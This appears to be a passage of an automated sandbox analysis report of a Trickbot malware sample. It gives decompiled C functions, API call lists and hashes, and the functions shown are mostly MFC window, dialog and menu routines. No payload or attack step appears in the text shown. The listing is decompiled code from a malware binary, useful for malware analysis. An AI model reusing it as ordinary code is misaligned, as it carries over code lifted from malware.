                          • LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 004098BA
                          • LCMapStringW.KERNEL32(?,00000100,00000100,00000100,?,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00409922
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: String$ByteCharMultiWide
                          • String ID:
                          • API String ID: 352835431-0
                          • Opcode ID: 08f1af1a6257b852480a0b7e22cfb9c59dbb6420ff9ef480f6eb62d81f264e40
                          • Instruction ID: 6ce60451d40e9022e1854fd40207490277e1f8a0feb6d6cda9ab32592d839c94
                          • Opcode Fuzzy Hash: 08f1af1a6257b852480a0b7e22cfb9c59dbb6420ff9ef480f6eb62d81f264e40
                          • Instruction Fuzzy Hash: 965149B2510209ABCF219F958C45AEB7FB4FB49750F10412AF910A22A1C33A9D50DBA9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 97%
                          			E0042C05A(intOrPtr* __ecx, void* __eflags) {
                          				intOrPtr _v4;
                          				struct HWND__* _v8;
                          				int _v12;
                          				int _v20;
                          				void* __ebp;
                          				int _t37;
                          				intOrPtr _t38;
                          				intOrPtr _t39;
                          				struct HWND__* _t42;
                          				int _t44;
                          				struct HWND__* _t64;
                          				struct _PROPSHEETHEADER* _t78;
                          				intOrPtr* _t81;
                          				int _t83;
                          				intOrPtr _t84;
                          				void* _t85;
                          
                          				_t81 = __ecx;
                          				E0041B266(__ecx, 0x10);
                          				E0041B266(__ecx, 0x3c000);
                          				 *((intOrPtr*)( *__ecx + 0xbc))();
                          				_t37 =  *((intOrPtr*)(E00432562() + 4));
                          				_v12 = _t37;
                          				if(_t37 != 0) {
                          					E00428536(0);
                          				}
                          				_t38 =  *((intOrPtr*)(_t81 + 0x7c));
                          				_t89 = _t38;
                          				if(_t38 != 0) {
                          					_t39 =  *((intOrPtr*)(_t38 + 0x1c));
                          				} else {
                          					_t39 = 0;
                          				}
                          				_t64 = E004286DC(_t39,  &_v8);
                          				_t78 = E0042BD0C(_t81, _t89);
                          				_v20 = 0;
                          				 *(_t78 + 8) = _t64;
                          				if(_t64 != 0 && IsWindowEnabled(_t64) != 0) {
                          					EnableWindow(_t64, 0);
                          					_v12 = 1;
                          				}
                          				_t42 = GetCapture();
                          				if(_t42 != 0) {
                          					SendMessageA(_t42, 0x1f, 0, 0);
                          				}
                          				 *(_t81 + 0x24) =  *(_t81 + 0x24) | 0x00000010;
                          				 *((intOrPtr*)(_t81 + 0x2c)) = 0;
                          				E00418D00(0, _t81);
                          				 *(_t78 + 5) =  *(_t78 + 5) | 0x00000004;
                          				 *(_t81 + 0x24) =  *(_t81 + 0x24) | 0x00000010;
                          				_t44 = PropertySheetA(_t78);
                          				 *(_t78 + 5) =  *(_t78 + 5) & 0x000000fb;
                          				_t83 = _t44;
                          				E00418D4C();
                          				if(_t83 == 0 || _t83 == 0xffffffff) {
                          					 *(_t81 + 0x24) =  *(_t81 + 0x24) & 0xffffffef;
                          				}
                          				_t84 =  *((intOrPtr*)(_t81 + 0x2c));
                          				if( *((intOrPtr*)( *_t81 + 0x70))() != 0) {
                          					_t85 = 4;
                          					if((E0041B66F(_t81) & 0x00000001) != 0) {
                          						_t85 = 5;
                          					}
                          					_push(_t85);
                          					_t84 = E0041B024(_t81);
                          				}
                          				if( *((intOrPtr*)(_t81 + 0x1c)) != 0) {
                          					E0041B784(_t81, 0, 0, 0, 0, 0, 0x97);
                          				}
                          				if(_v12 != 0) {
                          					EnableWindow(_t64, 1);
                          				}
                          				if(_t64 != 0 && GetActiveWindow() ==  *((intOrPtr*)(_t81 + 0x1c))) {
                          					SetActiveWindow(_t64);
                          				}
                          				 *((intOrPtr*)( *_t81 + 0x58))();
                          				if(_v4 != 0) {
                          					E00428536(1);
                          				}
                          				if(_v8 != 0) {
                          					EnableWindow(_v8, 1);
                          				}
                          				return _t84;
                          			}
                          0x0042c05f 0x0042c063 0x0042c06d 0x0042c076 0x0042c081 0x0042c088 0x0042c08c 0x0042c091 0x0042c091 0x0042c096 0x0042c099 0x0042c09b 0x0042c0a1 0x0042c09d 0x0042c09d 0x0042c09d 0x0042c0b3 0x0042c0ba 0x0042c0be 0x0042c0c2 0x0042c0c5 0x0042c0d4 0x0042c0da 0x0042c0da 0x0042c0e2 0x0042c0ea 0x0042c0f1 0x0042c0f1 0x0042c0f7 0x0042c0fc 0x0042c0ff 0x0042c104 0x0042c108 0x0042c10d 0x0042c113 0x0042c117 0x0042c119 0x0042c122 0x0042c129 0x0042c129 0x0042c12f 0x0042c139 0x0042c13f 0x0042c148 0x0042c14c 0x0042c14c 0x0042c14d 0x0042c155 0x0042c155 0x0042c15a 0x0042c168 0x0042c168 0x0042c171 0x0042c176 0x0042c176 0x0042c17e 0x0042c18c 0x0042c18c 0x0042c196 0x0042c19f 0x0042c1a3 0x0042c1a3 0x0042c1ae 0x0042c1b6 0x0042c1b6 0x0042c1c3

                          APIs
                          • IsWindowEnabled.USER32(00000000), ref: 0042C0C8
                          • EnableWindow.USER32(00000000,00000000), ref: 0042C0D4
                          • GetCapture.USER32 ref: 0042C0E2
                          • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 0042C0F1
                          • PropertySheetA.COMCTL32(00000000,?,?,00000001,?,?,00000000), ref: 0042C10D
                          • EnableWindow.USER32(00000000,00000001), ref: 0042C176
                          • GetActiveWindow.USER32 ref: 0042C180
                          • SetActiveWindow.USER32(00000000), ref: 0042C18C
                          • EnableWindow.USER32(?,00000001), ref: 0042C1B6
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Window$Enable$Active$CaptureEnabledMessagePropertySendSheet
                          • String ID:
                          • API String ID: 61310451-0
                          • Opcode ID: 8480f47b30342456b10db9addb93e20acd871bd336158a2009cd748364251c11
                          • Instruction ID: 235a76fc60bddd43f69087eac986def6a218281fbe580fcc8418a429f5aa133d
                          • Opcode Fuzzy Hash: 8480f47b30342456b10db9addb93e20acd871bd336158a2009cd748364251c11
                          • Instruction Fuzzy Hash: 2841C430300710ABD721AF75E889A6FB7E5AF44701F94492EF24686292DBB99C848A5D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 93%
                          			E00411E60() {
                          				signed int _t35;
                          				struct HWND__* _t38;
                          				signed int _t40;
                          				signed char _t47;
                          				intOrPtr* _t50;
                          				long _t51;
                          				signed int _t55;
                          				signed int _t56;
                          				signed int _t57;
                          				long _t58;
                          				int _t59;
                          				void* _t61;
                          				void* _t64;
                          				void* _t66;
                          				void* _t68;
                          				void* _t69;
                          
                          				_t58 = GetCurrentThreadId();
                          				EnterCriticalSection(0x44d320);
                          				if( *0x44d394 == _t58) {
                          					L10:
                          					_t56 =  *0x44d398; // 0x0
                          					LeaveCriticalSection(0x44d320);
                          					_t59 =  *(_t64 + 0x18);
                          					_t51 =  *(_t64 + 0x20);
                          					__eflags = _t59 - 3;
                          					if(_t59 == 3) {
                          						_t61 =  *_t51;
                          						__eflags =  *((intOrPtr*)(_t61 + 0x28)) - 0x8002;
                          						if( *((intOrPtr*)(_t61 + 0x28)) != 0x8002) {
                          							__eflags =  *(_t56 * 4 + 0x44d3b0 + _t56 * 4 * 4) & 0x00000001;
                          							if(__eflags != 0) {
                          								_t35 = E00411E20(__eflags,  *(_t61 + 0xc));
                          								_t64 = _t64 + 4;
                          								__eflags = _t35;
                          								if(__eflags != 0) {
                          									L24:
                          									_push( *(_t61 + 0xc));
                          									_push(1);
                          									_push(0xffff);
                          									_push( *(_t64 + 0x1c));
                          									E004121F0(__eflags);
                          									_t64 = _t64 + 0x10;
                          								} else {
                          									_t38 =  *(_t61 + 0xc);
                          									__eflags = _t38;
                          									if(_t38 != 0) {
                          										__eflags =  *0x44d362 - 0x18;
                          										if(__eflags != 0) {
                          											_t40 = E00411E20(__eflags, GetParent(_t38));
                          											_t64 = _t64 + 4;
                          											__eflags = _t40;
                          											if(__eflags != 0) {
                          												goto L24;
                          											}
                          										}
                          									}
                          								}
                          							}
                          						} else {
                          							__eflags =  *0x44d362 - 0x20;
                          							if( *0x44d362 != 0x20) {
                          								E00410800( *(_t64 + 0x1c), E00411AF0);
                          								_t64 = _t64 + 8;
                          							} else {
                          								__eflags =  *0x44d360 - 0x35f;
                          								if( *0x44d360 < 0x35f) {
                          									L15:
                          									 *(_t64 + 0x10) = 1;
                          								} else {
                          									_t47 = GetWindowLongA( *(_t64 + 0x1c), 0xfffffff0);
                          									 *(_t64 + 0x10) = 0;
                          									__eflags = _t47 & 0x00000004;
                          									if((_t47 & 0x00000004) == 0) {
                          										goto L15;
                          									}
                          								}
                          								_t62 =  *(_t64 + 0x1c);
                          								SendMessageA( *(_t64 + 0x1c), 0x11f0, 0, _t64 + 0x10);
                          								__eflags =  *(_t64 + 0x10);
                          								if( *(_t64 + 0x10) != 0) {
                          									E00410660(_t62, E00411AF0);
                          									_t64 = _t64 + 8;
                          								}
                          							}
                          						}
                          					}
                          					_t57 = _t56 << 2;
                          					__eflags = _t57;
                          					_t28 = _t57 * 4; // 0x0
                          					return CallNextHookEx( *(_t57 + _t28 + 0x44d3a8), _t59,  *(_t64 + 0x20), _t51);
                          				} else {
                          					_t55 = 0;
                          					_t66 = _t55 -  *0x44d39c; // 0x0
                          					if(_t66 < 0) {
                          						_t50 = 0x44d3a4;
                          						while( *_t50 != _t58) {
                          							_t50 = _t50 + 0x14;
                          							_t55 = _t55 + 1;
                          							_t68 = _t55 -  *0x44d39c; // 0x0
                          							if(_t68 < 0) {
                          								continue;
                          							} else {
                          							}
                          							L7:
                          							_t69 = _t55 -  *0x44d39c; // 0x0
                          							goto L8;
                          						}
                          						 *0x44d398 = _t55;
                          						 *0x44d394 = _t58;
                          						goto L7;
                          					}
                          					L8:
                          					if(_t69 != 0) {
                          						goto L10;
                          					} else {
                          						LeaveCriticalSection(0x44d320);
                          						return CallNextHookEx(0,  *(_t64 + 0x18),  *(_t64 + 0x1c),  *(_t64 + 0x20));
                          					}
                          				}
                          			}
                          0x00411e6d 0x00411e74 0x00411e80 0x00411ee3 0x00411ee3 0x00411eee 0x00411ef4 0x00411ef8 0x00411efc 0x00411eff 0x00411f05 0x00411f07 0x00411f0e 0x00411f95 0x00411f9d 0x00411fa3 0x00411fa8 0x00411fab 0x00411fad 0x00411fd4 0x00411fdb 0x00411fdc 0x00411fde 0x00411fe3 0x00411fe4 0x00411fe9 0x00411faf 0x00411faf 0x00411fb2 0x00411fb4 0x00411fb6 0x00411fbe 0x00411fc8 0x00411fcd 0x00411fd0 0x00411fd2 0x00000000 0x00000000 0x00411fd2 0x00411fbe 0x00411fb4 0x00411fad 0x00411f10 0x00411f10 0x00411f18 0x00411f84 0x00411f89 0x00411f1a 0x00411f1a 0x00411f23 0x00411f40 0x00411f40 0x00411f25 0x00411f32 0x00411f34 0x00411f3c 0x00411f3e 0x00000000 0x00000000 0x00411f3e 0x00411f48 0x00411f59 0x00411f5f 0x00411f64 0x00411f70 0x00411f75 0x00411f75 0x00411f64 0x00411f18 0x00411f0e 0x00411fec 0x00411fec 0x00411ff4 0x0041200b 0x00411e82 0x00411e82 0x00411e84 0x00411e8a 0x00411e8c 0x00411e91 0x00411e95 0x00411e98 0x00411e99 0x00411e9f 0x00000000 0x00000000 0x00411ea1 0x00411eaf 0x00411eaf 0x00000000 0x00411eaf 0x00411ea3 0x00411ea9 0x00000000 0x00411ea9 0x00411eb5 0x00411eb5 0x00000000 0x00411eb7 0x00411ebc 0x00411ee0 0x00411ee0 0x00411eb5

                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 00411E67
                          • EnterCriticalSection.KERNEL32(0044D320), ref: 00411E74
                          • LeaveCriticalSection.KERNEL32(0044D320), ref: 00411EBC
                          • CallNextHookEx.USER32(00000000,?,?,?), ref: 00411ED3
                          • LeaveCriticalSection.KERNEL32(0044D320), ref: 00411EEE
                          • GetWindowLongA.USER32(?,000000F0), ref: 00411F32
                          • SendMessageA.USER32(?,000011F0,00000000,00000001), ref: 00411F59
                          • GetParent.USER32(?), ref: 00411FC1
                          • CallNextHookEx.USER32(00000000,?,?,?), ref: 00411FFE
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: CriticalSection$CallHookLeaveNext$CurrentEnterLongMessageParentSendThreadWindow
                          • String ID:
                          • API String ID: 1151315845-0
                          • Opcode ID: 7c296e72cc49e1848fc4b26e7d4e687d229dd7d636ab293c9f5c1f9e134043c9
                          • Instruction ID: 566123adae329056eb8d190a0be39afb99822f784079320abbbb04965ed9e31a
                          • Opcode Fuzzy Hash: 7c296e72cc49e1848fc4b26e7d4e687d229dd7d636ab293c9f5c1f9e134043c9
                          • Instruction Fuzzy Hash: 8141B075A04301ABD710DF94EC85FAB77A8EB45714F00012AFE45832A1D7B8E889CB6E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 98%
                          			E00428DD6(intOrPtr* __ecx, intOrPtr _a4) {
                          				signed int _v8;
                          				intOrPtr _v12;
                          				struct tagPOINT _v20;
                          				void* __ebp;
                          				signed int _t49;
                          				struct HWND__* _t60;
                          				intOrPtr _t63;
                          				intOrPtr _t66;
                          				void* _t68;
                          				void* _t72;
                          				intOrPtr _t81;
                          				void* _t82;
                          				intOrPtr _t83;
                          				struct HWND__* _t85;
                          				intOrPtr _t86;
                          				intOrPtr* _t87;
                          				void* _t88;
                          
                          				_t87 = __ecx;
                          				_t42 = GetKeyState(1);
                          				if(_t42 < 0) {
                          					L31:
                          					return _t42;
                          				}
                          				_t83 = E00432335();
                          				_v12 = _t83;
                          				GetCursorPos( &_v20);
                          				ScreenToClient( *(_t87 + 0x1c),  &_v20);
                          				_t49 =  *((intOrPtr*)( *_t87 + 0x64))(_v20.x, _v20.y, 0, _t82);
                          				_v8 = _t49;
                          				if(_t49 < 0) {
                          					 *(_t83 + 0x104) =  *(_t83 + 0x104) | 0xffffffff;
                          					L16:
                          					if(_v8 < 0) {
                          						L25:
                          						if( *(_v12 + 0x104) == 0xffffffff) {
                          							KillTimer( *(_t87 + 0x1c), 0xe001);
                          						}
                          						 *((intOrPtr*)( *_t87 + 0xdc))(0xffffffff);
                          						L28:
                          						_t42 = 0xe000;
                          						if(_a4 != 0xe000) {
                          							goto L31;
                          						}
                          						_t42 = KillTimer( *(_t87 + 0x1c), 0xe000);
                          						if(_v8 < 0) {
                          							goto L31;
                          						}
                          						return  *((intOrPtr*)( *_t87 + 0xdc))(_v8);
                          					}
                          					ClientToScreen( *(_t87 + 0x1c),  &_v20);
                          					_push(_v20.y);
                          					_t85 = WindowFromPoint(_v20);
                          					if(_t85 == 0) {
                          						L23:
                          						_t59 = _v12;
                          						_v8 = _v8 | 0xffffffff;
                          						 *(_t59 + 0x104) =  *(_v12 + 0x104) | 0xffffffff;
                          						L24:
                          						if(_v8 >= 0) {
                          							goto L28;
                          						}
                          						goto L25;
                          					}
                          					_t60 =  *(_t87 + 0x1c);
                          					if(_t85 == _t60 || IsChild(_t60, _t85) != 0) {
                          						goto L24;
                          					} else {
                          						_t63 =  *((intOrPtr*)(_v12 + 0xcc));
                          						if(_t63 != 0) {
                          							_t63 =  *((intOrPtr*)(_t63 + 0x1c));
                          						}
                          						if(_t63 == _t85) {
                          							goto L24;
                          						} else {
                          							goto L23;
                          						}
                          					}
                          				}
                          				_t72 = E00419DFD(_t87);
                          				if(E00419E69(_t87) == 0 || E0041B7FA(_t72) == 0) {
                          					_v8 = _v8 | 0xffffffff;
                          				}
                          				_t66 =  *((intOrPtr*)(_t83 + 0xcc));
                          				if(_t66 != 0) {
                          					_t86 =  *((intOrPtr*)(_t66 + 0x1c));
                          				} else {
                          					_t86 = 0;
                          				}
                          				_t68 = E0041884D(_t88, GetCapture());
                          				if(_t68 != _t87) {
                          					if(_t68 != 0) {
                          						_t81 =  *((intOrPtr*)(_t68 + 0x1c));
                          					} else {
                          						_t81 = 0;
                          					}
                          					if(_t81 != _t86 && E00419DFD(_t68) == _t72) {
                          						_v8 = _v8 | 0xffffffff;
                          					}
                          				}
                          				goto L16;
                          			}

                          APIs
                          • GetKeyState.USER32(00000001), ref: 00428DE2
                          • GetCursorPos.USER32(?), ref: 00428E00
                          • ScreenToClient.USER32(?,?), ref: 00428E0D
                          • GetCapture.USER32 ref: 00428E5D
                            • Part of subcall function 0041B7FA: IsWindowEnabled.USER32(?), ref: 0041B804
                          • ClientToScreen.USER32(?,?), ref: 00428EA7
                          • WindowFromPoint.USER32(?,?), ref: 00428EB3
                          • IsChild.USER32(?,00000000), ref: 00428EC8
                          • KillTimer.USER32(?,0000E001), ref: 00428F0E
                          • KillTimer.USER32(?,0000E000), ref: 00428F2B
                            • Part of subcall function 00419E69: GetForegroundWindow.USER32 ref: 00419E6D
                            • Part of subcall function 00419E69: GetLastActivePopup.USER32(?), ref: 00419E85
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Window$ClientKillScreenTimer$ActiveCaptureChildCursorEnabledForegroundFromLastPointPopupState
                          • String ID:
                          • API String ID: 1383385731-0
                          • Opcode ID: e5fbce50810550d46d8ed74f656d5b0de3f5a08dcde35e27ad7a0dee953dc1f0
                          • Instruction ID: 19b93b02eaa40a217b1260908b1a439f07e08304da6157451def390ab9c29590
                          • Opcode Fuzzy Hash: e5fbce50810550d46d8ed74f656d5b0de3f5a08dcde35e27ad7a0dee953dc1f0
                          • Instruction Fuzzy Hash: 3D419D31701211EFDB209F65DC88AAE77B6AF44324F61466EE421D72E1DB78DD42CB08
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 97%
                          			E0041784E(intOrPtr* __ecx) {
                          				void* __esi;
                          				signed int _t40;
                          				struct HWND__* _t45;
                          				signed int _t49;
                          				signed char _t54;
                          				struct HWND__* _t56;
                          				struct HINSTANCE__* _t61;
                          				void* _t63;
                          				void* _t74;
                          				intOrPtr* _t78;
                          				void* _t80;
                          				void* _t82;
                          
                          				E00405340(E00437754, _t80);
                          				_t78 = __ecx;
                          				 *((intOrPtr*)(_t80 - 0x10)) = _t82 - 0x18;
                          				 *((intOrPtr*)(_t80 - 0x1c)) = __ecx;
                          				_t74 =  *(__ecx + 0x44);
                          				 *(_t80 - 0x18) =  *(__ecx + 0x48);
                          				_t40 = E00432562();
                          				_t61 =  *(_t40 + 0xc);
                          				if( *(_t78 + 0x40) != 0) {
                          					_t61 =  *(E00432562() + 0xc);
                          					_t40 = LoadResource(_t61, FindResourceA(_t61,  *(_t78 + 0x40), 5));
                          					_t74 = _t40;
                          				}
                          				if(_t74 != 0) {
                          					_t40 = LockResource(_t74);
                          					 *(_t80 - 0x18) = _t40;
                          				}
                          				if( *(_t80 - 0x18) != 0) {
                          					 *(_t80 - 0x14) = E004177D2(_t78);
                          					E00418D4C();
                          					__eflags =  *(_t80 - 0x14);
                          					 *(_t80 - 0x20) = 0;
                          					if( *(_t80 - 0x14) != 0) {
                          						_t56 = IsWindowEnabled( *(_t80 - 0x14));
                          						__eflags = _t56;
                          						if(_t56 != 0) {
                          							EnableWindow( *(_t80 - 0x14), 0);
                          							 *(_t80 - 0x20) = 1;
                          						}
                          					}
                          					 *(_t80 - 4) = 0;
                          					E00418D00(_t80, _t78);
                          					_t45 = E0041755F(_t78,  *(_t80 - 0x18), E0041884D(_t80,  *(_t80 - 0x14)), _t61);
                          					__eflags = _t45;
                          					if(_t45 != 0) {
                          						__eflags =  *(_t78 + 0x24) & 0x00000010;
                          						if(( *(_t78 + 0x24) & 0x00000010) != 0) {
                          							_t63 = 4;
                          							_t54 = E0041B66F(_t78);
                          							__eflags = _t54 & 0x00000001;
                          							if((_t54 & 0x00000001) != 0) {
                          								_t63 = 5;
                          							}
                          							_push(_t63);
                          							E0041B024(_t78);
                          						}
                          						__eflags =  *(_t78 + 0x1c);
                          						if( *(_t78 + 0x1c) != 0) {
                          							E0041B784(_t78, 0, 0, 0, 0, 0, 0x97);
                          						}
                          					}
                          					 *(_t80 - 4) =  *(_t80 - 4) | 0xffffffff;
                          					__eflags =  *(_t80 - 0x20);
                          					if( *(_t80 - 0x20) != 0) {
                          						EnableWindow( *(_t80 - 0x14), 1);
                          					}
                          					__eflags =  *(_t80 - 0x14);
                          					if(__eflags != 0) {
                          						__eflags = GetActiveWindow() -  *(_t78 + 0x1c);
                          						if(__eflags == 0) {
                          							SetActiveWindow( *(_t80 - 0x14));
                          						}
                          					}
                          					 *((intOrPtr*)( *_t78 + 0x58))();
                          					E0041780C(_t78, _t78, __eflags);
                          					_t49 =  *(_t78 + 0x2c);
                          				} else {
                          					_t49 = _t40 | 0xffffffff;
                          				}
                          				 *[fs:0x0] =  *((intOrPtr*)(_t80 - 0xc));
                          				return _t49;
                          			}

                          APIs
                          • __EH_prolog.LIBCMT ref: 00417853
                          • FindResourceA.KERNEL32(?,00000000,00000005), ref: 0041788B
                          • LoadResource.KERNEL32(?,00000000), ref: 00417893
                            • Part of subcall function 00418D4C: UnhookWindowsHookEx.USER32(?), ref: 00418D71
                          • LockResource.KERNEL32(?), ref: 004178A0
                          • IsWindowEnabled.USER32(?), ref: 004178D3
                          • EnableWindow.USER32(?,00000000), ref: 004178E1
                          • EnableWindow.USER32(?,00000001), ref: 0041796F
                          • GetActiveWindow.USER32 ref: 0041797A
                          • SetActiveWindow.USER32(?), ref: 00417988
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Window$Resource$ActiveEnable$EnabledFindH_prologHookLoadLockUnhookWindows
                          • String ID:
                          • API String ID: 401145483-0
                          • Opcode ID: 55f4f651615edf0b421152356afd6a3bd07eac2c458a828ba3dd18a63a6d0bae
                          • Instruction ID: df77f07aa3b0ffd03d4ea8f7affb4ed44756e49cd40aa01723e3664a9dcdd2ed
                          • Opcode Fuzzy Hash: 55f4f651615edf0b421152356afd6a3bd07eac2c458a828ba3dd18a63a6d0bae
                          • Instruction Fuzzy Hash: 4B41B0B1904704EFEB21AF64C849AEEBBB5EF48711F10012FF502A22D1CBB95D80CB59
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 86%
                          			E004280F7(signed int __ecx) {
                          				void* _t33;
                          				void* _t34;
                          				CHAR* _t41;
                          				signed int _t42;
                          				signed int _t43;
                          				struct HWND__* _t44;
                          				signed int _t51;
                          				void* _t53;
                          				signed int _t62;
                          				signed int _t73;
                          				signed int _t75;
                          				void* _t77;
                          
                          				E00405340(E00438158, _t77);
                          				_push(__ecx);
                          				_t51 =  *(_t77 + 0xc);
                          				_t62 = __ecx;
                          				_t33 = 0x80c83b00;
                          				 *(_t77 - 0x10) = __ecx;
                          				 *((intOrPtr*)(__ecx + 0xb0)) = 1;
                          				if((_t51 & 0x00000004) != 0) {
                          					_t33 = 0x80c83300;
                          				}
                          				_t34 = E0042F41A(_t62, 0, 0, 0x449788, _t33, 0x44b2c0,  *((intOrPtr*)(_t77 + 8)), 0);
                          				if(_t34 != 0) {
                          					asm("sbb esi, esi");
                          					_t73 = ( ~(_t51 & 0x00005000) & 0x0000f000) + 0x00002000 | _t51 & 0x00000040;
                          					_push(GetSystemMenu( *(_t62 + 0x1c), 0));
                          					_t53 = E0041CF83();
                          					DeleteMenu( *(_t53 + 4), 0xf000, 0);
                          					DeleteMenu( *(_t53 + 4), 0xf020, 0);
                          					DeleteMenu( *(_t53 + 4), 0xf030, 0);
                          					DeleteMenu( *(_t53 + 4), 0xf120, 0);
                          					_t41 =  *0x447478; // 0x44748c
                          					 *(_t77 + 0xc) = _t41;
                          					 *(_t77 - 4) =  *(_t77 - 4) & 0x00000000;
                          					_t42 = E0041C67E(_t77 + 0xc, __eflags, 0xf011);
                          					__eflags = _t42;
                          					if(_t42 != 0) {
                          						DeleteMenu( *(_t53 + 4), 0xf060, 0);
                          						AppendMenuA( *(_t53 + 4), 0, 0xf060,  *(_t77 + 0xc));
                          					}
                          					_t75 =  *(_t77 - 0x10);
                          					_t43 = E00427223(_t75 + 0xcc,  *((intOrPtr*)(_t77 + 8)), _t73 | 0x50000000, 0xe81f);
                          					__eflags = _t43;
                          					if(_t43 != 0) {
                          						__eflags = _t75;
                          						if(_t75 != 0) {
                          							_t44 =  *(_t75 + 0x1c);
                          						} else {
                          							_t44 = 0;
                          						}
                          						E0041884D(_t77, SetParent( *(_t75 + 0xe8), _t44));
                          						_push(1);
                          						_pop(0);
                          					}
                          					 *(_t75 + 0xb0) =  *(_t75 + 0xb0) & 0x00000000;
                          					_t27 = _t77 - 4;
                          					 *_t27 =  *(_t77 - 4) | 0xffffffff;
                          					__eflags =  *_t27;
                          					E00417EC8(_t77 + 0xc);
                          					_t34 = 0;
                          				} else {
                          					 *((intOrPtr*)(_t62 + 0xb0)) = 0;
                          				}
                          				 *[fs:0x0] =  *((intOrPtr*)(_t77 - 0xc));
                          				return _t34;
                          			}

                          APIs
                          • __EH_prolog.LIBCMT ref: 004280FC
                          • GetSystemMenu.USER32(?,00000000), ref: 00428170
                          • DeleteMenu.USER32(?,0000F000,00000000), ref: 0042818E
                          • DeleteMenu.USER32(?,0000F020,00000000), ref: 0042819A
                          • DeleteMenu.USER32(?,0000F030,00000000), ref: 004281A6
                          • DeleteMenu.USER32(?,0000F120,00000000), ref: 004281B2
                          • DeleteMenu.USER32(?,0000F060,00000000), ref: 004281DB
                          • AppendMenuA.USER32(?,00000000,0000F060,?), ref: 004281EA
                          • SetParent.USER32(?,?), ref: 00428227
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Menu$Delete$AppendH_prologParentSystem
                          • String ID:
                          • API String ID: 3391233131-0
                          • Opcode ID: 6a152e9788b5ff6521e4e8cf5f6a8124d2964ab76b8c664bcbc592c19217963e
                          • Instruction ID: d5ab09647c54943920d7376705d625934b6c60ac671d2df8162f1bd9f4bb883e
                          • Opcode Fuzzy Hash: 6a152e9788b5ff6521e4e8cf5f6a8124d2964ab76b8c664bcbc592c19217963e
                          • Instruction Fuzzy Hash: C931B731780615FBEB205F61DC46F9EBA65EF54710F108139F9156B1E1CBB8AC01DB68
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 51%
                          			E00415C80(void* __ebx) {
                          				int _v4;
                          				struct HWND__* _v8;
                          				void* __ecx;
                          				void* __esi;
                          				void* __ebp;
                          				struct HWND__* _t28;
                          				int _t32;
                          				int _t33;
                          				int _t35;
                          				void* _t36;
                          				void* _t41;
                          				void* _t42;
